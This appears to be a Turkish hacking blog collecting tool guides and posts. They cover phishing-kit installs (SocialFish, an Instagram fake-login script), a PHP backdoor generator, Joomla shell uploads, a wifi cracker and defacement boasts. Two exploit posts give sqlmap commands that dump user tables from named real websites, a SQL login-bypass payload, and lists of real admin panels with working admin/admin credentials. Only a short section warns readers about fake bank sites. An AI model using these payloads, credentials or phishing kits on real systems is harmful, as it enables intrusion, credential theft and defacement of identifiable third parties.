Kali Linux Ultimate Phishing Tool Socialfish

Selamun Aleyküm ..

Bu Araç Ngrok Kullanarak Hizli Bir Şekilde Phising Sayfasi Oluşturmaniza Yarar.

MEVCUT SAYFALAR

+ Facebook:

Geleneksel Facebook giriş sayfası.

Facebook'la gelişmiş giriş.

+ Google:

Geleneksel Google giriş sayfası.

Facebook'la gelişmiş giriş.

+ LinkedIn:

Geleneksel LinkedIn oturum açma sayfası.

+ Github:

Geleneksel Github giriş sayfası.

+ Stackoverflow:

Geleneksel Stackoverflow giriş sayfası.

+ Wordpress:

Benzer Wordpress giriş sayfası.

+ Twitter:

Geleneksel Twitter giriş sayfası.

Kurulum ;

git clone https://github.com/UndeadSec/SocialFish.git

cd SocialFish

sudo pip install -r requirements.txt

python SocialFish.py

Bu Araçla Oluşturulan Kimlik Avı Sayfalarını

intitle:"There's a Phishing Page generated by SocialFish in this website." Yazarak Bulabilirsiniz.

Video:

Sahte Banka Siteleriyle Dolandırıcılık Hakkinda

Bankaların resmi sitelerini birebir kopyalayan bilgisayar korsanlarının, banka müşterilerinin özel bilgilerini ele geçirerek vatandaşları dolandırdığını yıllardır biliyoruz zaten yeni birşey değil ...

Sosyal medyada bazi kanı bozuk insanlar facebook, instagram, twitter gibi platformlardan  kendilerinin oluşturdukları SAHTE BANKA  sitelerinin reklamlarını yapmaktadırlar bunlara itimat etmeyin girdiginiz sitelere Dikkat ediniz!

SSL Sertifikasina ALDANMAYİNİZ.

Bakiniz : Sizce bu site orjinal sitemi ?

Evet tahmin ettiğiniz gibi değil zaten. Bir çok VATAN'daşımız Bu konuda mağdur malesef

Bu Tür REKLAMLARA ALDIRMAYINIZ!

Daha dün akşam aldığim bir ekran görüntüsü;

Birebir ziraat bankasının aynısını yapmışlar o kısmın ekran göruntüsünü alamadık malum saat geç olmuştu, admin paneline girdiğimizde ziraatbank-inetbireysel.com adresinden başka bir adrese yönlendiriyordu 

Panelden yönlendirilen site: vakifgiris.com'du

biz gerekli bilgileri almaya çalışırken sanırım fark edildik  Dns kayıtlari değiştirilerek default olarak ayarlandı.

Uzun lafın kısası diyeceğim şu ki ; 

Bizlere düşen görev;

Bu tür sitelere denk geldiğimiz zaman gerekli kurumlara anında mail göndermek. Ardından çevremizdekilerin bu tür olaylara inanmayacağını, önüne gelen her linke girilmeyeceğini yönünde bilinçlendirmemiz gerekiyor. Özellikle çevremizde bulunan yaşlılara durumu anlayabilecekleri şekilde anlatmamız gerekiyor, çoğunlukla yaşlı kesimin bu olaylar hakkında bilgisi daha az oluyor.

Anonturkey.org Hacked

Selamun Aleykum,

Dün gece geç saatlerde Cumhurbaşkanımız hakkında Anonymous tarafından ahlaksız bir paylaşım yapıldı.
Bu devletin başında her kim olursa olsun yapılacak bir saygısızlık Türk milletine yapılmış bir saygısızlıktır!
Bu topluluğun Türkiye kolu olarak geçinen, geçinmeye çalışan ve kendilerini bu şekilde gösterenlere "Sipahilerin" mührünü vurduk!

İndexte gereken her şey yazıyor...

zone: http://www.zone-h.org/mirror/id/30823099?zh=1

Varan 2! Anonturkey Twitter Hesabı Hacked!

Dün akşam saatlerinde bu çapulcuların sitesine uğramıştık.
İlgili Konu; Özel Saldırılar - Anonturkey.org Hacked!

Hemen akabinde bunlardan alışık olduğumuz "Bize ait değil" açıklaması beklerken daha farklı bir söylem ile karşı karşıya kaldık. Hoş bu tür sözlere de alışkınız.. 

"Cumhurbaşkanımıza yapılan ahlaksızlığa cevap verdik diye Milli Şuur ve feraset noktasında kurulduğumuz ilk günden beridir taviz vermeyen ve hiç bir karşılık beklemeden Sayısız operasyona imza atmış Sipahiler’e “Paralı Köpek” yakıştırmasını yapabilecek kadar hadsiz ve onursuz bu oluşumun son kolu twitter hesabına da "Sipahi" mührü vurduk. "

Emeği geçen Sipahiler personelinin yüreğine sağlık... 
Unuttuğunuz ne var ise hatırlatmaya geliyoruz...​

Kali Linux Striker

Striker, bir bilgi ve güvenlik açığı tarayıcısıdır.

Özellikler

Striker'a bir alan adı girmeniz yeterlidir ve sizin için otomatik olarak aşağıdakileri yapar:

Check and Bypass Cloudflare

 Retrieve Server and Powered by Headers

 Fingerprint the operating system of Web Server

 Detect CMS (197+ CMSs are supported)

 Launch WPScan if target is using Wordpress

 Retrieve robots.txt

 Whois lookup

 Check if the target is a honeypot

 Port Scan with banner grabbing

 Dumps all kind of DNS records

 Generate a map for visualizing the attack surface

 Gather Emails related to the target

 Find websites hosted on the same web server

 Find hosts using google

 Crawl the website for URLs having parameters

 SQLi scan using online implemention of SQLMap (takes < 3 min.)

 Basic XSS scanning

Kurulum:

git clone https://github.com/UltimateHackers/Striker

cd Striker

pip install -r requirements.txt

python striker.py -h

Video: 

Kali Linux Arachni Security Scanner Framework İnstall

Selamun Aleyküm ..

Kali Linux Arachni Web Application Security Scanner Framework İnstall

Arachni Dowloand

Default account details:
Administrator:
E-mail address: admin@admin.admin
Password:       administrator

Joomla Admin Panel Shell Upload

Selamun Aleyküm ..

Arada joomlaya nasıl shel atıcaz diye sorular geliyor ona hitafen bu videoyu çekmiştim. Template kısmından yüklüyoruz kabuğumuzu ancak dikkat etmeniz gereken bir durum var tema kısmında yazma izni olması lazım. yoksada arastırın joomlada izinlerin düzenlenebileceği bi kısım war oradan izinleri düzenleyin..

Veritabanindan Siteye İndex Atma

Selamun Aleyküm..

Cloud Linux Etc Passwd Bypass WebMail

Selamun ALeyküm ..

Kali Linux FileZilla İnstall

Selamun Aleyküm ..

apt-get install filezilla

Kali Linux Nexpose Vulnerability Scanner İnstall

Selamun Aleyküm ...

Dowloand: https://www.rapid7.com/products/nexpose/

PHP Backdoor Tool Netkit

Selamun Aleyküm...

Netkit nedir? Netkit, basit ve işlevsel bir "PHP Arka Kapi Aracı" dır. Netkit ile Python ve PHP ile geliştirilen PHP arka kapılarını üretebilir ve dinleyebilirsiniz.

Dowloand: git clone https://github.com/alpereneymen/netkit.git

Kali Linux Burpsuite Professional Web Site Vulnerability Scan

Selamun Aleyküm ..

Kali Linux Burpsuite Professional Web Site Vulnerability Scanner

Kali Linux Sub Domain Search Sublist3r

Selamu Aleyküm..

Sublist3r, OSINT kullanan web sitelerinin alt alanlarını numaralandırmak için tasarlanmış bir python araçtır. Penetrasyon test cihazları ve hata avcılarının hedefledikleri alan adına alt alanlar toplamaları için yardımcı olur. Sublist3r, Google, Yahoo, Bing, Baidu ve Ask gibi birçok arama motorunu kullanan alt alanları numaralandırır. Sublist3r ayrıca Netcraft, Virustotal, ThreatCrowd, DNSdumpster ve ReverseDNS'yi kullanarak alt alanları numaralandırır.

Kurulum : 

git clone https://github.com/aboul3la/Sublist3r.git
Yada: apt update && apt -y install sublist3r

Önerilen Python Sürümü:

Sublist3r şu anda Python 2 ve Python 3'ü desteklemektedir .

Python 2 için önerilen sürüm 2.7.x'dir.

Python 3 için önerilen sürüm 3.4.x'dir.

Windows'ta Kurulum:

c:\python27\python.exe -m pip install -r requirements.txt

Linux'ta Kurulum : 

sudo pip install -r requirements.txt

Kullanim : 

Kısa form Uzun Form Açıklama

-d --domain Alt etki alanlarını numaralandırmak için alan adı

-b --kaba kuvvet Zayıf bruteforce modülünü etkinleştir

-p --ports Bulunan alt alanları belirli TCP portlarına karşı tarayın

-v --verbose Ayrıntılı modu etkinleştirin ve sonuçları gerçek zamanlı olarak görüntüleyin

-t --İş Parçacığı Subtribute bruteforce için kullanılacak thread sayısı

-e --engines Virgülle ayrılmış arama motorları listesi belirtme

-O --çıktı Sonuçları metin dosyasına kaydedin

-h --yardım et yardım mesajını göster ve çık

Genel Komut: python sublist3r.py -d kali.org -t 3 -e bing

Video:

Kali Linux 2017.3 Telegram İnstall

Selamun Aleyküm ..

Dowloand: https://desktop.telegram.org/

Get Telegram For Linux 64 Bit

cd Telegram

chmod +x Telegram

./Telegram

Video:

Nmap Script Vulners.nse

Selamun Aleyküm..

Açıklama

Güvenlik açıkları hakkında bilgi vermek için iyi bilinen bazı servisleri kullanan NSE komut dosyasıdir.

Bagımlılıklar :

nmap libraries:

     http

     json

     string

          

Aklınızda tutmanız gereken tek şey, senaryonun elinde bulunan yazılım sürümlerine sahip olmasıdır; bu nedenle yalnızca -sV bayrağıyla çalışır.

scripti usr/share/nmap klasorundekı script dosyasına vulners.nse olarak kayıt edıyorsunuz...

Dowlonad: https://raw.githubusercontent.com/vulnersCom/nmap-vulners/master/README.md

Kullanim: 

nmap -sV --script vulners <target>

Kali Linux Android Emülatör Kurulumu Genymation

Selamun Aleyküm..

Genymotion programı, Android’i Desktop cihazlara taşıyan bir emülatördür. Yani Genymotion’ı indirerek bilgisayarınızda sanal bilgisayar oluşturabilir, program içerisindeki dosyaların kurulumu gerçekleştirerek bilgisayarınızda Android işletim sistemi yüklü sanallaştırılmış mobil cihaz kullanmaya başlayabilirsiniz.

İçerisinde Android KitKat, Lollipop, Marshmallow, Nougat versiyonları ve Nexus, Samsung, Sony Xperia ve tablet modellerini barındırıyor. Android Pentest İçin ideal bir emülatör.

 Genymation Dowloand

Not: Üye olmanız gerekmektedir + virtualbox'un kurulu olması lazım.

Kali Linux VirtualBox Kurulumu

Video;

Kali Linux Paros Website Vulnerability Scanner

Selamun Aleyküm...

Intro  - "Paros" Proxy, web uygulamalarının güvenliğini değerlendirmek isteyen kişiler için yazılmıştır. Paros'un proxy niteliği sayesinde, çerezler ve form alanları da dahil olmak üzere, sunucu ve istemci arasındaki tüm HTTP ve HTTPS verileri engellenebilir ve değiştirilebilir.

Paros , Web Uygulaması Denetleme, test etme ve hata ayıklama için, ücretsiz Java tabanlı bir araçtır. Bu konuda, Paros'un birçok kullanımının sadece birkaçı gösterilecektir. Paros'un proxy özelliği, bir tarayıcıya gelen ve bu tarayıcıdan gelen trafiği denetlemek açısından çok değerlidir. Bu, geliştiricilerin ve denetçilerin, çerezlerin nasıl ayarlandığı, bir tarayıcıya yönlendirilen yönlendirmeler ve tarayıcıdan sunucuya gönderilen sorgular gibi web uygulama mimarilerinin çeşitli yönlerini araştırmalarını sağlar. Paros bazı otomatik tarama araçlarını içeriyor olsa da, bunlar oldukça zayıf ve Paros, neyi arayacağını bilen yetenekli bir penetrasyon test aracidir. (HTTP / HTTPS proxy. On-the-fly HTTP, XSS, SQL Enjeksiyonlari vb..)

Video: 

Begenip abone olmayı unutmayın..

IIS Group Admin Panel Bypass And Sql İnjection Vulnerability

[CODE]#################################################################################

# Exploit Title: IIS Group Admin Panel Bypass And Sql İnjection Vulnerability

# Author : TrazeR & Sipahiler & TurkZ.org

# Google Dork : intext:"Powered by IIS Group"

# Tested on : Kali Linux 2017 Chrome, Firefox

# Date : 20.12.2017

# Vendor Home: http://www.iisgroup.co.za/

# Blog : http://www.trazer.org/

# Forum : http://www.turkz.org/Forum/

# Telegram: https://t.me/turkzgrup

#################################################################################

Tutorial :

[+] Dorking İn Google Or Other Search Enggine

[+] Open Target

[+] /admin/

[+] /admin/login.asp

[+] Sql GET parameter 'cat' is vulnerable

Command:root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10  --random-agent --text-only  --no-cast  -u "http://www.deville.co.za/products.asp?cat=35"  -T users -C id,name,pw --dump

Parameter: cat (GET)

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: cat=35 AND 8346=8346

Demo: Sql:

http://www.deville.co.za/products.asp?cat=35'===> admin  dv147

http://www.adval.co.za/online.asp?controller=news&view=all&id=1'

http://www.iisgroup.co.za/admin/login.asp?error=1'

===>

http://www.mactool.co.za/admin/login.asp ===> '=''or' 

http://superfloral.info/admin/login.asp ===> '=''OR'

Username:  admin   Password: admin

Username: '=''or'  Password: '=''or'

http://absolutecars.co.za/admin/online.asp ===> admin admin

http://www.thehosevan.co.za/admin/online.asp ===> admin admin

http://www.fluidco.co.za/admin/online.asp ===> admin admin

http://www.burma.co.za/cms/index.php  ===> admin admin

http://farsa.biz/admin/login.asp ===> admin admin

http://fundisa-academy.com/admin/online.asp ===> admin admin

http://efpglobal.com/admin/online.asp ===> admin admin

http://biscuitmanufacturers.co.za/admin/login.asp ===> admin admin

http://www.fluidco.co.za/admin/online.asp ===> admin admin

http://www.360businessparks.com/admin/online.asp ===>  admin admin

http://www.360storagesolutions.co.za/admin/online.asp ===> admin admin

http://www.thehosevan.co.za/admin/online.asp ===> admin admin

http://viewdns.info/reverseip/?host=196.44.35.90&t=1 Choose Random Target

FREE PALESTINE & FREE GAZA ===> İSREAL TERRORIST #KUDUS İSLAMİNDİR!

Greet'Zzz : ABIKANBEY & EfendiBey & Atabey & TrazeR & Zer0day & Kutluhan & Göçebe & BlueTrojen

[/CODE]

Kali Linux Gerix Wifi Cracker2

Selamun Aleyküm ...

gerix-wifi-cracker-2 pythonla yazılmış bir wifi crack aracidir.

Kullanımı basit ve etkilidir.

gerix ile WEB - WPA- WPA2 şifrelerini elde edebilirsiniz. 

Kurulum: 

git clone https://github.com/J4r3tt/gerix-wifi-cracker-2.git

cd gerix-wifi-cracker-2

chmod +x gerix.py

python gerix.py 

Video:

Bazi kendini bilmez Kişilik yoksunu Kancik' ciklar kanalima sacma sapan yorumlar  ve dislike atıyorlar onların ben buradan ....

Abone Olup Beğenmeyi Unutmayin.

Credits Previcinidesign Sql Injection Vulnerability

KOD:

#################################################################################
# Exploit Title: CREDITS PREVICINIDESIGN Sql İnjection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"CREDITS PREVICINIDESIGN" & inurl:id= Or Web by PREVICINIDESIGN & php?id=
# Tested on : Kali Linux 2017 Chrome, Firefox
# Date : 2017-12-01
# Vendor Home: http://www.previcinidesign.com/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################
Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Open Target
[+] Sqlmap And Manuel

Command : root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10  --random-agent --text-only -u "http://www.onoya.it/it/menu.php?idCat=25" --no-cast --batch --dbs

Parameter: idCat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: idCat=25 AND 3326=3326

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: idCat=25 AND SLEEP(5)


Demo:
http://www.onoya.it/it/menu.php?idCat=25
http://www.amarcordpiadineria.it/notizie-fresche.php?ID=15
http://www.osteopatiassociati.it/casi-scheda.php?ID=29
http://ibrubinetterie.com/eng/collezione-doccia-lista.php?ID=7

Panel:
http://www.onoya.it/aps
http://www.amarcordpiadineria.it/admin/
http://www.osteopatiassociati.it/admin/
http://ibrubinetterie.com/admin/

Greet'Zzz : Darkcod3r & EfendiBey & Atabey & TrazeR & Zer0day & Kutluhan & Göçebe & BlueTrojen
Special Thanks TurkZ.org All Staff

Linux Server Bypass C1 & Ln -s

Selamun Aleyküm...

Yapılanlar gayet açık ve net, tek sıkıntı 42. saniyede excute kısmından komut verirken mkdir yazmamişim. 

"mkdir TURKZ" yazarak yenı bı dizin oluşturabilirsiniz .videoda karışmıs hatlar direk turkz yazmışız yanlış yere (: Shelin make dir kısmından TURKZ yazarakda direk dizin açabilirsiniz.

Video: 

İnstagram Phishing Fake Login Script

Selamun Aleykum..

İki Adet İnstagram Fake Login Sayfası War Elimde Sizlerle Paylasmak İstedım.

Birincisi Biraz amatör, Mail Adresıne Gönderıyor Bilgileri 

İkincisi Biraz Daha Orjınal Ama ingiliççe :)

Bunun Logları Sunucuda Bulundugu Dizıne Gelİyor logger.txt Metin Belgesine

Script Dowloand: İnstagram Phishing

Video:

Kali Linux TNscan

Selamun Aleyküm ..

TNscan Script Özellikleri:

1.Tüm web sitelerini al

2.Joomla web sitelerini al

3.WordPress web sitelerini edinin

4.Kontrol paneli bul

5.Zip dosyalarını bulun

6.Kurulum dosyalarını bulun

7.Sunucu kullanıcılarını edinin

8.SQL enjeksiyonundan tara

9.SQL enjeksiyonundan tarama ve tarama (yakında)

10.Tarama portları (liman aralığı)

11.Tarama portları (ortak portlar)

12.Sunucu afişini alın

13.Cloudflare'yi atla

14.Hakkında!

15. Çıkış

[CODE]git clone https://github.com/voletri/TNscan.git[/CODE]

Sunucudaki Tüm Sitelerde SQL Taramasi Yapabilir Wordpress Joomla Gibi Siteleride Bulabilir.

Kullanişli Script Kullanmanizi Tavsiye Ederim.

Video: 

Kali Linux TheMole Automatic SQL Injection Exploitation Tool

Selamun Aleyküm ...

Kali Linux TheMole otomatik SQL Enjeksiyon sömürme aracı

TheMole, bir komut satırı arabirimi SQL Enjeksiyon sömürme aracıdır.

Bu uygulama union-based, blind, boolean-based dayali Enjeksiyonlardan yararlanabilir.

The Mole, Mysql, Mssql ve Postgresql'i desteklemektedir;

apt-get update

apt-get install themole yazarak kurabilirsiniz.

Detaylar : TheMole Master README

SQL Injection Using Burp Suite And Sqlmap

Selamun Aleyküm ..

Burpsuite SQLMapper Co2

Bu uzantı, Burp'un kabiliyetlerini arttırmak için çeşitli modüller içeriyor.

Uzantının her Co2 modülü için alt sekmeli kendi yapılandırma sekmesi vardır. Diğer Burp araçlarıyla etkileşim kuran modüller Co2 yapılandırma sekmesinden devre dışı bırakılabilir, bu nedenle işlevselliğin bir bölümünü kullanırken tüm uzantıyı devre dışı bırakmaya gerek yoktur

CO2 aşağıdaki modülleri içerir:

SQLMapper, bir sqlmap yardımcı. Burp'taki herhangi bir isteği sağ tıklatın ve SQLMapper'e isteği göndermek için yeni bir menü seçeneği göreceksiniz. SQLMapper ekranı, istekle birlikte URL, POST verileri (varsa) ve Çerezler (varsa) ile önceden doldurulmuş olarak görünür. Ardından, ihtiyacınız olan diğer seçenekleri ayarlayabilir ve sonra SQLMap Komutunu komut satırında sqlmap'e kopyalayıp / yapıştırabilirsiniz.

CeWLer - HTML dosyalardan bir wordlist çıkartmak için Digininja'nın komut satırı CeWL komut dosyasına dayanan bu sürüm doğrudan Burp'un içindeki yanıtların bir listesiyle birlikte çalışır.

Masher - Öğütücü - Kelimelerin bir tohum listesi ve bir şifre belirtimi göz önüne alındığında, bu araç olası şifrelerin bulanık bir listesini oluşturacaktır. Masher, verilen listeden gelen kelimeleri birleştirerek başlayacak, ardından yeni şifreler oluşturmak için karakterleri ekleyecek ve değiştirecektir.

BasicAuther - Bir kullanıcı adı listesi ve bir şifre listesi verildiğinde, o zaman daha sonra Hırsız alanına atılabilecek uygun BasicAuth dizeleri çıktılacaktır.

Name Mangler - Bazı adları ve alanları verildiğinde, onları geçerli girişleri test etmek için Intruder'a düşebilecek potansiyel kullanıcı adlarının bir listesini oluşturmak için harekete geçirir.

Video: